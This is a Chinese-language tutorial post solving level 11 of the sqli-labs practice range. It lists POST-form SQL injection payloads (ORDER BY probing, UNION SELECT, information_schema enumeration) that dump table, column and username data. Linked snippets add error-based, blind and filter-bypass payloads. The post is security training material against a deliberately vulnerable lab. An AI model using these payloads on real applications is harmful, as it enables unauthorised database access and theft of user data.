Sqlilabs-11

2024-03-07 15:58
文章标签 sqlilabs

本文主要是介绍Sqlilabs-11,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

3bcddb4a752d26f1a8c417cea594948.png

从第 11 关开始我们进入了 POST 环节,什么是 POST ,POST 就是数据从客户端提交到服务端,例如在这个关卡中,我们就是将用户名和密码以表单的形式提交给服务器,然后服务器再进行验证。

8c6bbaf2658f91e8c82f06287c203a6.png

如图,在 Hackbar 我们需要构造 uname passwd submit 三样东西,其实这跟我们做的第一关没什么差别,只是换了个地方构造 payload 而已,或者你可以不用 hackbar ,直接在输入框里输入构造 payload 也是可以的。

c95668e36c9562a64c00e7c0c055b08.png

a058239fd51969cd116754e812cb6de.png

这里就以 hackbar 为例构造 payload:
uname=admin' order by 3#&passwd=1&submit=submit
uname=admin' order by 2#&passwd=1&submit=submit

uname=-admin' union select 1,2#&passwd=1&submit=submit

55690c5c54fc69a174c08a5617076cd.png

uname=-admin' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#&passwd=1&submit=submit

aa4fe8ae17f6a23430ff8e8f235d5e1.png

uname=-admin' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name = 'users'#&passwd=1&submit=submit

8dbea83dbbdebdad6fb9c4b29121c07.png

uname=-admin' union select 1,group_concat(username) from users#&passwd=1&submit=submit

7a9f7974996d51dcacab27821e55a19.png

uname=-admin' union select 1,group_concat(username) from users#&passwd=1&submit=submit

219727e6a07eb26fe95abf03a838eba.png

😄

这篇关于Sqlilabs-11的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/784050

相关文章

sqlilabs less21-25关手工注入

第21关 一.登录页面 二 .Burp Suite 抓包,进入重放器 三.查询数据库 先进行编码 ')and updatexml(1,concat(1,database()),1)# 四.查表,先进行编码 ')and updatexml(1,concat(1,(select group_concat(table_name) from information_sche

以sqlilabs靶场为例,讲解SQL注入攻击原理【54-65关】

【Less-54】 与前面的题目不同是,这里只能提交10次,一旦提交超过十次,数据会重新刷新,所有的步骤需要重来一次。 解题步骤: 根据测试,使用的是单引号闭合。 # 判断字段的数量?id=1' order by 3 -- aaa# 获取数据库的名字?id=-1' union select 1,2,database() -- aa# 获取数据表的名字?id=-1' union s

sqlilabs靶场安装

05-sqllabs靶场安装 1 安装 1 把靶场sqli-labs-master.zip上传到 /opt/lampp/htdocs 目录下 2 解压缩 unzip sqli-labs-master.zip 3 数据库配置 找到配置文件,修改数据库配置信息 用户名密码,修改为你lampp下mysql的用户名密码,root/123456host:lampp服务器的ip地址 /opt

以sqlilabs靶场为例,讲解SQL注入攻击原理【25-31关】

【Less-25】 首先分析源码 发现把 SQL语句中的 or、and 替换成了空格,这就导致无法使用之前的sql注入方式。 解决方案:用 && 代替 and , 用 || 代替 or , 而且&在url中有特殊含义,如果直接使用会有问题,所以还需要对&&进行urlencode编码处理。 ?id=1' and 1=1 -- aaa改为?id=1' && 1=1 -- aaa #

以sqlilabs靶场为例,讲解SQL注入攻击原理【15-17关】

【less-15:布尔盲注】 单引号闭合 1. '  or (length(database()))  -- += 数字:判断数据库长度; 2. '  or (ascii(substr(database(),1,1)))  -- += 数字:获取组成数据库的字符; 3. ' or (ascii(substr((select table_name from information_schem

以sqlilabs靶场为例,讲解SQL注入攻击原理【18-24关】

【less-18】 打开时,获取了自己的IP地址。,通过分析源码知道,会将用户的user-agent作为参数记录到数据库中。 提交的是信息有user-Agent、IP、uname信息。 此时可以借助Burp Suite 工具,修改user_agent,实现sql注入。 最后得到数据库名:security。 解题步骤: //第一步获取数据库名' and updatexml(

Linux搭建sqlilabs靶场

提前准备: 文章中所使用到的Linux系统:Ubantu20.4sqlilabs靶场下载地址:GitHub - Audi-1/sqli-labs: SQLI labs to test error based, Blind boolean based, Time based. 一. 安装phpstudy phpstudy安装命令:wget -O install.sh

2-手工sql注入(进阶篇) sqlilabs靶场5-10题

1. 阅读,学习本章前,可以先去看看基础篇:1-手工sql注入(基础篇)-CSDN博客 2. 本章通过对sqlilabs靶场的实战,关于sqlilabs靶场的搭建:Linux搭建靶场-CSDN博客 3. 本章会使用到sqlmap,关于sqlmap的命令:sql注入工具-​sqlmap-CSDN博客 点击访问题目: 通过 url 参数访问题目:http://服务器地址/sq

2-手工sql注入(进阶篇) sqlilabs靶场1-4题

1. 阅读,学习本章前,可以先去看看基础篇:1-手工sql注入(基础篇)-CSDN博客 2. 本章通过对sqlilabs靶场的实战,关于sqlilabs靶场的搭建:Linux搭建靶场-CSDN博客 3. 本章会使用到sqlmap,关于sqlmap的命令:sql注入工具-​sqlmap-CSDN博客 点击访问题目: 通过 url 参数访问题目:http://服务器地址/sqlila

sqlilabs靶场1—20题学习笔记(思路+解析+方法)

前几个题目较为简单,均尝试使用各种方法进行SQL注入 第一题 联合查询 1)思路: 有回显值 1.判断有无注入点 2.猜解列名数量 3.判断回显点 4.利用注入点进行信息收集 爆用户权限,爆库,爆版本号 爆表,爆列,爆账号密码 2)解题过程: ?id=1' and 1=1--+和?id=1' and 1=2--+进行测试如果1=1页面显示正常和原页面一样,并且1=2页面报错或者